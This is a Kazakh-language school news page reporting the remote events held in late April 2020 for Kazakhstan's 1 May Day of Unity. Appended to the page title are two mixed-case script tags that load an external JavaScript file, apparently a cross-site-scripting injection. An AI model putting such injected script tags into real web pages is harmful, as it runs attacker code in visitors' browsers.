1 Мамыр – Қазақстан халқы бірлігі күні мерекесіне орай өткізілген іс-шаралар есебі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.05.2020

27-30 сәуір аралығында Симферополь орта мектебінде «1-мамыр Қазақстан халқы бірлігі күніне» арналған апталық өтті.

  Апта ішінде келесі іс-шаралар жүргізілді:

  1. 27 сәуір күні 1-4 сынып оқушылары арасында «Біз бірлігі жарасқан елміз» атты суреттер көрмесі өтті.
  2. 27 сәуір күні «Жүректері жымыр  бірлікте ұжымдасқан» виртуалды кітаптар көрмесі өтті. Ұйымдастырған – кітапханашы Жусупбекова А.К.
  3. 28 сәуір күні «Әр елдің ұлттық тағамдары» атты челлендж өтті. Челленджге 5-11 сынып оқушылары қатысты. Оқушылар өздері таңдаған ұлттың ұлттық тағамын әзірлеп , дайындалу жолын «Инстаграм» желісіне жариялады.
  4. 29 сәуір күні «Мен көп ұлтты елмін», «Достығы жарасқан ұлттар» атты эссе өткізілді. Эссені ұйымдастырған – тіл мұғалімдері Омарова А.О., Серикова З.О.
  5. 30 сәуір күні «Қазақстан – достық шаңырағы» атты онлайн сынып сағаты өтті.

Елімізде болып жатқан індетке байланысты 1 Мамыр – Қазақстан халқы бірлігі күні мерекесіне орай өткізілген іс-шаралар қашықтықтан өтті, өткізілген іс-шаралар инстаграм желісінде жарияланды.

Просмотров: 732


Пікір қосу



Деректерді қолтаңбаға қосу